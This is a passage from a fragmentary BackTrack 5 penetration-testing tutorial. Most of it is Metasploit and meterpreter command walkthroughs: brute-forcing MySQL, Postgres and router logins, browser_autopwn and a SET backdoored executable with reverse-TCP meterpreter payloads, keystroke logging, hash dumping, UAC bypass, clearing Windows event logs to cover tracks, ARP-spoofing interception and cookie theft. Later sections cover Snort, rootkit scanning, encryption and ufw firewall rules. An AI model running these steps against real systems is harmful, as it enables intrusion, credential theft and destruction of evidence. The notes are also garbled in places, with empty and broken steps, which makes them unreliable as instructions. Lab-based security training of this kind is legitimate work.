5. irb: an interactive Ruby shell inside the framework.
   msf > irb
   [*] Starting IRB shell...
   >> puts "Hello, metasploit!"
   Hello, metasploit!
   >> Framework::Version
   => "3.3-dev"
   >> framework.modules.keys.length
   => 744
6. jobs: modules running in the background of msf.
7. jobs options: -K kills all jobs; -k kills one job; -i shows information about a job.
   load: load a plugin.
   msf > load
   Usage: load [var=val var=val ...]
   Example:
   msf > load pcap_log
   [*] Successfully loaded plugin: pcap_log
8. unload: unload a plugin.
   msf > load pcap_log
   [*] Successfully loaded plugin: pcap_log
   msf > unload pcap_log
   Unloading plugin pcap_log...unloaded.
9. route: route traffic through a session (pivoting). In meterpreter, route -h shows:
   add [subnet] [netmask] [gateway]
   delete [subnet] [netmask] [gateway]
   list
   msf exploit(ms08_067_netapi) > route
   Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]
   Route traffic destined to a given subnet through a supplied session.
   The default comm is Local.
   msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 2
   msf exploit(ms08_067_netapi) > route print
   Active Routing Table
   ====================
   Subnet        Netmask          Gateway
   ------        -------          -------
   192.168.1.0   255.255.255.0    Session 2
10. info: information about a module (author and licensing information, vulnerability references such as CVE, BID, etc).
   msf > info dos/windows/smb/ms09_001_write
   Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset
   Version: 6890
   License: Metasploit Framework License (BSD)
   Provided by: j.v.vallejo
11. set / unset: set module (and payload) options.
   msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
   RHOST => 192.168.1.1
   msf auxiliary(ms09_001_write) > show options
   Module options:
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.1      yes       The target address
   RPORT  445              yes       Set the SMB service port
   unset:
   msf > set RHOSTS 192.168.1.0/24
   RHOSTS => 192.168.1.0/24
   msf > set THREADS 50
   THREADS => 50
   msf > set
   Global
   ======
   Name     Value
   ----     -----
   RHOSTS   192.168.1.0/24
   THREADS  50
   msf > unset THREADS
   Unsetting THREADS...
   msf > unset all
   Flushing datastore...
   msf > set
   Global
   ======
   No entries in data store.
12. sessions: list and interact with sessions (meterpreter, VNC, shells ...); sessions -i <id> interacts with one.
   msf exploit(3proxy) > sessions -i 1
   [*] Starting interaction with 1...
13. search:
   msf > search ms09-001
   [*] Searching loaded modules for pattern 'ms09-001'...
   Auxiliary
   =========
   Name                             Description
   ----                             -----------
   dos/windows/smb/ms09_001_write   Microsoft SRV.SYS WriteAndX Invalid DataOffset
14. show: list modules (auxiliary, exploits, ...) and options.
   msf > show auxiliary
   Auxiliary
   =========
   Name                                Description
   ----                                -----------
   admin/backupexec/dump               Veritas Backup Exec Windows Remote File Access
   admin/backupexec/registry           Veritas Backup Exec Server Registry Access
   admin/cisco/ios_http_auth_bypass    Cisco IOS HTTP Unauthorized Administrative Access
   ...snip...
   msf > show exploits
   show encoders
   msf > show payloads
   show nops
   show options
   show advanced
   show targets
15. ps: list the processes on the target.
   meterpreter > ps
16. migrate: move meterpreter into another process (e.g. notepad): find its pid with ps, then
   migrate 1540   (pid=1540)
17. ls: list files on the target.
   meterpreter > ls
18. download: download a file from the target.
   meterpreter > download c:\\boot.ini
   [*] downloading: c:\boot.ini -> c:\boot.ini
   [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
19. upload: upload a file (here evil_trojan.exe) to the target.
   meterpreter > upload evil_trojan.exe c:\\windows\\system32
20. ipconfig: network configuration of the target.
21. execute: run a command on the target.
   execute -f cmd.exe -i -H
22. hashdump: dump the password hashes of the user accounts.
   meterpreter > run post/windows/gather/hashdump
   [*] Obtaining the user list and keys...
   [*] Decrypting user keys...
   [*] Dumping password hashes...
   Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
   dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
   Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Metasploitable MySQL: a word-list attack on the MySQL service with Metasploit (mysql_login).
1) msfconsole
2) search MySQL
3) brute-force the SQL login: use auxiliary/scanner/mysql/mysql_login
4) show options
5) set RHOSTS 192.168.10.111
6) user word-list: set user_file /root/Desktop/usernames.txt
7) password word-list: set pass_file /root/Desktop/passwords.txt
8) exploit
   The module reports every user + password combination that logs in.
Metasploitable Postgresql: the same procedure as for MySQL, with the postgres login module and the bundled default word-lists:
set RHOSTS 192.168.10.111
set user_file /opt/metasploit/msf3/data/wordlists/postgres_default_user.txt
set pass_file /opt/metasploit/msf3/data/wordlists/postgres_default_pass.txt
exploit
Implementing the browser_autopwn module:
msfconsole
search autopwn
use auxiliary/server/browser_autopwn
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.10.109    (LHOST = your IP address)
set URIPATH "filetypes"
exploit
Metasploit starts the server at http://[Provided IP Address]:8080/ (the LHOST address).
When a session opens:
  sessions -i 1
  help
  keyscan_start
  keyscan_dump
1: Metasploitable Tomcat ...
2: Metasploitable PDF ...
3: Wifi Hacking: Karmetasploit In Action
References:
Metasploit:
http://www.offensive-security.com/me...loit_In_Action
http://www.backtrack-linux.org/forum...hp?t=21492#top
www.hackingdna.com
http://wirelessdefence.org/Contents/karmetasploit.htm
https://www.google.com/#q=tutorial+metasploit
http://www.offensive-security.com/metasploit-unleashed/Attack_Analysis
http://searchsecurity.techtarget.in/tip/BackTrack-5-tutorial-Part-I-Information-gathering-and-VA-tools
http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics
http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient
http://sectools.org/tag/sploits/
Metasploitable Tomcat:
http://www.rapid7.com/db/modules/exp...cat_mgr_deploy
http://www.rapid7.com/db/modules/aux...mcat_mgr_login
http://www.securitygeeks.net/2013/05...he-tomcat.html
http://www.offensive-security.com/me...n_HTTP_Modules
www.youtube.com/watch?v=o8_qLxPW--s
www.youtube.com/watch?v=0-ue2_q_9oU
Metasploitable PDF:
http://www.offensive-security.com/me..._Side_Exploits
http://www.offensive-security.com/me...rting_Exploits
http://www.exploit-db.com/exploits/14681/
http://blog.g0tmi1k.com/2011/03/vide...dobe-pdfs.html
https://community.rapid7.com/thread/2742
http://www.rapid7.com/db/modules/exp...f_embedded_exe
Karmetasploit In Action:
http://www.offensive-security.com/me...loit_In_Action
http://www.backtrack-linux.org/forum...hp?t=21492#top
http://wirelessdefence.org/Contents/karmetasploit.htm
Web exploitation tools:
http://www.blackhatlibrary.net/Category:Web_exploitation
http://www.dotslashbacktrack.com/web-exploitation-tools.html
http://www.aldeid.com/wiki/Websecurify
http://www.aldeid.com/wiki/W3AF
http://searchsecurity.techtarget.in/tip/A-Web-exploit-toolkit-reference-guide-for-BackTrack-5
http://www.aldeid.com/wiki/Category:Backtrack/GUI/Exploitation-Tools/Web-Exploitation-Tools
311
Privilege Escalation
Using impersonation tokens:
meterpreter session.
1) sessions -i 1
2) meterpreter: use incognito
3) help
4) list_tokens -u
5) impersonate_token \\test-pc\willie
impersonate_token [name of the account to impersonate]
Local privilege escalation attack:
1.
2. getsystem -h
getsystem
Windows 7 UAC (User Account Control): run post/windows/escalate/bypassuac
Mastering the Social-Engineer Toolkit (SET):
1) set framework:
cd /pentest/exploits/set
or: Applications | BackTrack | Exploitation Tools | Social Engineering Tools | Social Engineering Toolkit | set.
2) ./set
3) y, enter.
4) set menu:
Social-Engineering Attacks
Fast-Track Penetration Testing
Third Party Modules
Update the Metasploit Framework
Update the Social-Engineer Toolkit
Update SET configuration
Help, Credits, and About
Exit the Social-Engineer Toolkit
1) "Social-Engineering Attacks" (option 1). 2) Create a Payload and Listener (option 4):
3) ip (reverse connection): 192.168.10.109
4) payload: Windows Reverse_TCP Meterpreter
5) Encoding: option 2 (bypass)
6) 16: Backdoored Executable (BEST).
7) handler (exploit handler).
Collecting victims' data:
keyscan_start
keyscan_dump
Cleaning up the tracks:
sessions -i 1
irb
log = client.sys.eventlog.open('system')
log = client.sys.eventlog.open('security')
log = client.sys.eventlog.open('application')
log = client.sys.eventlog.open('directory service')
log = client.sys.eventlog.open('dns server')
log = client.sys.eventlog.open('file replication service')
log.clear
Man-in-the-middle attack (MITM).
1) ettercap -G
2) Sniff | Unified sniffing
3)
4) Hosts | Scan for hosts
5) Hosts | Hosts list
192.168.10.112: Add to Target 1.
6) Start | Start sniffing
7) Mitm | Arp poisoning (arp)
8) Sniff remote connections
9)
10) Start | Stop sniffing
URL traffic manipulation: arp, arpspoof
ip-tables.
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
win7 ip: 192.168.10.115.
(-i) wlan=wireless, eth=Ethernet, lo=loopback.
(-t) sudo arpspoof -i wlan0 -t 192.168.10.115 192.168.10.1
arpspoof -i [interface] -t [target IP address] [destination IP address].
sudo arpspoof -i wlan0 -t 192.168.10.1 192.168.10.110 (gateway ip: 192.168.10.1; ip: 192.168.10.110).
Port redirection.
port redirection / port forwarding / port mapping: 80 to 8080.
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 192.168.10.1 (gateway ip: 192.168.10.1).
arpspoof -i [interface] [destination IP address].
ip: 192.168.10.110.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
(sniff).
Accessing an e-mail by stealing cookies:
Ettercap, SSLstrip, URLstrip, Easy-Creds. encrypt.
1) Creds: easy-creds.
2) ./easy-creds.sh
option 2
3) Oneway ARP Poisoning (option 3)
4) wlan0 5)
Creds: /root/Easy-Creds, /pentest/sniffers/easy-creds
6) "Do you have a populated file of victims to use?": n
gateway ip: 192.168.10.1
"Would you like to include a sidejacking attack?": n
9)
10) ettercap, easy-creds.
Password Cracking
Online Password and HTTP Attacks:
Hydra (THC-Hydra): FTP, HTTP, HTTPS, MS SQL, MySQL, VNC, Cisco, ...
1) hydra: Applications | BackTrack | Privilege Escalation | Password Attacks | Online Attacks | hydra-gtk
2) /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/nameslist.txt
/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/john.txt
3) target ip: 192.168.10.111 (tab)
4) number of tasks.
5) start
Gaining router access. 1. brute-force:
Applications | BackTrack | Privilege Escalation | Password Attacks | Online Attacks | medusa
2. medusa -M http -h 192.168.10.1 -u admin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -n 80 -F
-M: http. -h: ip. -u: admin. -P:. -e:. -F:.
-n:. Medusa:
AFP, CVS, FTP, HTTP, IMAP, MS SQL, MySQL, NetWare, NNTP, POP3, Postgresql, REXEC, RLOGIN, RSH, SMBNT, SMTP AUTH, SMTP VRFY, SNMP, SSHv2, Subversion, Telnet, VMware authentication, VNC, www
Password profiling:
1) meta: msfconsole
2) email: search email collector
3) use auxiliary/gather/search_email_collector
4) show options
5) set domain fromwilliesperspective.com
6) set outfile /root/Desktop/fromwillie.txt
7) run
8) Cracking a Windows password using John the Ripper:
(Physical access attack.) USB, john, SAM hash.
CD/DVD_ROM. john brute-force.
1) fdisk -l
2) mount /dev/sda1 /target/
3) SAM: cd /target/windows/system32/config
4) ls -al
5) samdump2 system SAM > /root/hashes/hash.txt
6) john ripper: cd /pentest/passwords/jtr
7) ./john /root/hashes/hash.txt
8) NTFS: ./john /root/hashes/hash.txt -f:nt
Using dictionary attacks.
1) apt-get update
2) apt-get install crunch
3) /pentest/passwords/crunch
4) crunch [minimum length] [maximum length] [character set] [options]
options
5) (8 10) -l:. @, %, ^: -b: GB, MB, KB: -o:.
/pentest/passwords/crunch/crunch 8 10 ABCDEFabcdefg0123456789 -o /root/Desktop/generatedCrunch.txt
6) nano /root/Desktop/generatedCrunch.txt
SUCrack Physical access attacks:
--help: options.
-s: 3. -l:.
-a: ANSI. -w: multithread. 1. crunch.
sucrack /pentest/passwords/wordlists/rockyou.txt 2. 6 ANSI.
sucrack -w 2 -s 6 -a /pentest/passwords/wordlists/rockyou.txt
BackTrack Forensics (snort):
Intrusion Detection System (IDS).
Snort.
1) snort rules:
https://www.snort.org/signup . http://snort.org/start/rules
2)
3) -i:. -c: /etc/snort/snort.conf. -v: TCP/IP "sniffer mode". -q: snort. Options:
snort -q -v -i eth1 -c /etc/snort/snort.conf
4) ctrl+x. snort:
1. locate snort.conf
2. nano /etc/snort/snort.conf
3. "var HOME_NET any".
var HOME_NET 192.168.10.10 (ip); var HOME_NET 192.168.10.0/24 (ip); var HOME_NET 192.168.10.0/24,10.0.2.0/24 (ip)
var HOME_NET 192.168.10.0/24
4.
Comment: #
#var EXTERNAL_NET any
var EXTERNAL_NET !$HOME_NET
pdf: www.snort.org/assets/166/snort_manual.pdf
Recursive directory encryption/decryption: gpgdir (enc, dec).
1) mkdir /sourcecode
cd /sourcecode
2) wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2
3) wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2.asc
4) gpg --import public_key
gpg --verify gpgdir-1.9.5.tar.bz2.asc
5) tar xfj gpgdir-1.9.5.tar.bz2
cd gpgdir-1.9.5
./install.pl
6) gpgdir
7) vi /root/.gpgdirrc
default_key.
1. mkdir /encrypted_directory
2. encrypt. 3.
gpgdir -e /encrypted_directory
4.
5. decrypt: gpgdir -d /encrypted_directory
http://cipherdyne.org/gpgdir/docs/
Scanning for signs of rootkits.
chkrootkit.
Applications | BackTrack | Forensics | Anti-Virus Forensics Tools | chkrootkit
cd /pentest/forensics/chkrootkit
./chkrootkit
1. rootkits: rkhunter.
2. rkhunter --check
chkrootkit: -l:. -V:. -h:.
1) rkhunter:
2) rkhunter --update
3) rkhunter --list (skip)
rkhunter --check --sk
Recovering data from a problematic source
1) fatback. USB.
fdisk -l. /dev/sdb1
2) mkdir /fatback
mkdir /fatback/thumbdrivefiles
3) cd /fatback
4) Applications | BackTrack | Forensics | Forensic Carving Tools | fatback
5)
fatback: -a:. -o: /fatback/thumbdrivefiles. ....
6) /dev/sdb1:
fatback /dev/sdb1 -o /fatback/thumbdrivefiles -a
ls
cd thumbdrivefiles
ls
http://www.forensicswiki.org/wiki/File_Carving
Retrieving a Windows password. Ophcrack
1) http://ophcrack.sourceforge.net/tables.php.
2) table
3) ophcrack tables.
4) install. 5)
Applications | BackTrack | Privilege Escalation | Password Attacks | Offline Attacks | Ophcrack-GUI
6) Load SAM
7) Crack
Resetting a Windows password.
1) C:\Windows\System32\Config.
fdisk -l
mount /dev/sda1 /target/
2) SAM: cd /target/windows/system32/config
3) ls -al
4) cd /pentest/passwords/chntpw
5) ./chntpw -i /target/windows/system32/config/SAM
6) What to Do? area: 1.
7) 1. 8) 1 (password blank).
Looking at the Windows registry entries. chntpw.
1) fdisk -l
mount /dev/sda1 /target/
2) SAM: cd /target/windows/system32/config
3) ls -al
4) cd /pentest/passwords/chntpw
5) (interactive mode) ./chntpw -i /target/windows/system32/config/SAM
6) What to Do? area: 9.
7) ls.
8) cd.
Appendix One.
Create or extract [tar, zip, tar.bzip2, tar.gz] files:
tar: $ tar -cvf filename.tar filename
tar.gz: $ tar -xvf filename.tar
$ tar -xvzf filename.tar.gz
zip: zip filename.zip
zip: unzip file.zip -d destination_folder
gz: $ gunzip file.gz
$ gzip -d file.gz
tar.bz2: bzip2 -cd file.tar.bz2 | tar xvf -
UFW: xarchiver, synaptic.
ubuntu 10.04.
UFW enable: sudo ufw enable
UFW disable: sudo ufw disable
sudo ufw status verbose
root@bt:~# ufw status verbose
Status: active
Logging: on (low)
Default: deny (incoming), allow (outgoing)
New profiles: skip
sudo ufw status
sudo ufw status
Firewall loaded
To Action From
22:tcp DENY 192.168.0.1
22:udp DENY 192.168.0.1
22:tcp DENY 192.168.0.7
22:udp DENY 192.168.0.7
22:tcp ALLOW 192.168.0.0/24
22:udp ALLOW 192.168.0.0/24
UFW:
sudo ufw allow [port]/[protocol]
1: sudo ufw allow 53
sudo ufw allow 53/tcp
sudo ufw allow 53/udp
sudo ufw deny [port]/[protocol]
2: sudo ufw deny 53/udp
sudo ufw deny 53
sudo ufw allow from [ip]
3: ip: sudo ufw allow from 207.46.232.182
subnet: sudo ufw allow from 192.168.1.0/24
sudo ufw allow from [ip] to [ip] port [port]
4: ip 192.168.0.4, port 22: sudo ufw allow from 192.168.0.4 to any port 22
sudo ufw allow from [ip] to [ip] port [port] proto [protocol]
5: port 22 tcp, ip 192.168.0.4: sudo ufw allow from 192.168.0.4 to any port 22 proto tcp
Enable/Disable ping:
/etc/ufw/before.rules:
# ok icmp codes
-A ufw-before-input -p icmp --icmp-type destination-unreachable -j ACCEPT
-A ufw-before-input -p icmp --icmp-type source-quench -j ACCEPT
-A ufw-before-input -p icmp --icmp-type time-exceeded -j ACCEPT
-A ufw-before-input -p icmp --icmp-type parameter-problem -j ACCEPT
-A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT
ping: change ACCEPT to DROP.
# ok icmp codes
-A ufw-before-input -p icmp --icmp-type destination-unreachable -j DROP
-A ufw-before-input -p icmp --icmp-type source-quench -j DROP
-A ufw-before-input -p icmp --icmp-type time-exceeded -j DROP
-A ufw-before-input -p icmp --icmp-type parameter-problem -j DROP
-A ufw-before-input -p icmp --icmp-type echo-request -j DROP
sudo ufw status numbered
sudo ufw delete 1
1: port 22, ip 192.168.0.3, 192.168.0.1, 192.168.0.7: sudo ufw status
Firewall loaded
To Action From
22:tcp DENY 192.168.0.1
22:udp DENY 192.168.0.1
22:tcp DENY 192.168.0.7
22:udp DENY 192.168.0.7
22:tcp ALLOW 192.168.0.0/24
sudo ufw delete allow from 192.168.0.0/24 to any port 22
sudo ufw status
Firewall loaded
To Action From
22:tcp DENY 192.168.0.1
22:udp DENY 192.168.0.1
22:tcp DENY 192.168.0.7
22:udp DENY 192.168.0.7
sudo ufw deny from 192.168.0.3 to any port 22
sudo ufw allow from 192.168.0.0/24 to any port 22 proto tcp
sudo ufw status
Firewall loaded
To Action From
22:tcp DENY 192.168.0.1
22:udp DENY 192.168.0.1
22:tcp DENY 192.168.0.7
22:udp DENY 192.168.0.7
22:tcp DENY 192.168.0.3
22:udp DENY 192.168.0.3
22:tcp ALLOW 192.168.0.0/24
ufw deny 80/tcp
sudo ufw delete deny 80/tcp
less /etc/services
sudo ufw allow [service]
sudo ufw allow ssh
sudo ufw deny ssh
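An added example, not part of the original tutorial, that applies ufw's first-match rule ordering to the rule table above: it parses the `ufw status` listing and reports what a given source address would get for a port, which is why the per-host DENY rules in the listing have to sit before the subnet-wide ALLOW. The sample listing is constructed from the appendix's table, and the parser assumes IPv4 rules only.

```python
import ipaddress
import re

# Constructed sample input, modelled on the "ufw status" table in this appendix
# (older ufw printed the To column as "22:tcp"; newer releases print "22/tcp").
SAMPLE_STATUS = """Status: active

To                         Action      From
--                         ------      ----
22:tcp                     DENY        192.168.0.1
22:udp                     DENY        192.168.0.1
22:tcp                     DENY        192.168.0.7
22:udp                     DENY        192.168.0.7
22:tcp                     DENY        192.168.0.3
22:udp                     DENY        192.168.0.3
22:tcp                     ALLOW       192.168.0.0/24
"""

# One rule line: "<port>[:/]<proto>  ALLOW|DENY|REJECT [IN|OUT]  <source>"
RULE_RE = re.compile(r"^(\S+)\s+(ALLOW|DENY|REJECT)(?:\s+(?:IN|OUT))?\s+(\S+)")

def parse_ufw_status(text):
    """Parse 'ufw status' output into (port, proto, action, source_network) tuples.
    IPv4 only (assumption): '(v6)' rows are skipped, 'Anywhere' becomes 0.0.0.0/0."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m or "(v6)" in line:
            continue  # header, separator, blank and IPv6 lines
        to, action, src = m.groups()
        if ":" in to or "/" in to:
            port, proto = re.split(r"[:/]", to, maxsplit=1)
        else:
            port, proto = to, "any"  # a bare port covers both tcp and udp
        net = ipaddress.ip_network("0.0.0.0/0" if src == "Anywhere" else src, strict=False)
        rules.append((int(port), proto, action, net))
    return rules

def decide(rules, src_ip, port, proto, default="DENY"):
    """First matching rule wins, in the order ufw installs them in iptables; with
    no match the default incoming policy applies. That is why the per-host DENY
    rules in the table above sit before the subnet-wide ALLOW."""
    ip = ipaddress.ip_address(src_ip)
    for r_port, r_proto, action, net in rules:
        if r_port == port and r_proto in ("any", proto) and ip in net:
            return action
    return default

def allowed_from_anywhere(rules):
    """Ports an ALLOW rule opens to every source: the ones to review first."""
    return sorted({(p, pr) for p, pr, a, net in rules
                   if a == "ALLOW" and net.prefixlen == 0})
```

With the sample table, 192.168.0.3 is denied on 22/tcp while 192.168.0.50 is allowed, and 22/udp falls through to the default deny because the udp ALLOW was deleted.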
Commands in BT5-R3:
1) touch:
touch alimp5.html
2) cat.
3) echo:
echo salaaam > alimp5.html
4) cp.
cp alimp5.html /tmp/alimp5.html
5) mv (cut, rename).
mv alimp5.html /root/alimp5.html
mv alimp5.html jafar.html
6) rm.
rm jafar.html
7) ps aux
8) Kill.
kill 1580
9) Locate.
10) Find.
find /root -name index.html
11) adduser
adduser azimzadeh
12) uname -a.
13) ls -la
14) passwd.
cat /etc/passwd
dpkg -i location-file.deb
dpkg -i /root/Desktop/ali.deb
rpm -i location-file.rpm
rpm -i /root/Desktop/ali.rpm
wine location-file.exe
wine /root/raidcall.exe
.sh (permission):
sh alimp5.sh
chmod 777 alimp5.sh
./alimp5.sh
vmware, vbox:
1) apache:
2) /var/www
3) ip: ifconfig
4) apache: 127.0.0.1/bt-vm.zip
http://192.168.1.3/bt-vm.zip.
Comodo.
DHCP_Server&Client:
synaptic
dhcp3: dhcp3-common, dhcp3-client, dhcp3-server.
www.pkgs.org, ubuntu 10.04:
dhcp3-client_3.1.3-2ubuntu3_i386.deb
dhcp3-common_3.1.3-2ubuntu3_i386.deb
dhcp3-server_3.1.3-2ubuntu3_i386.deb
(.deb; synaptic, 3)
dhcp3-common
dhcp3-server
dhcp3-client
Appendix Two: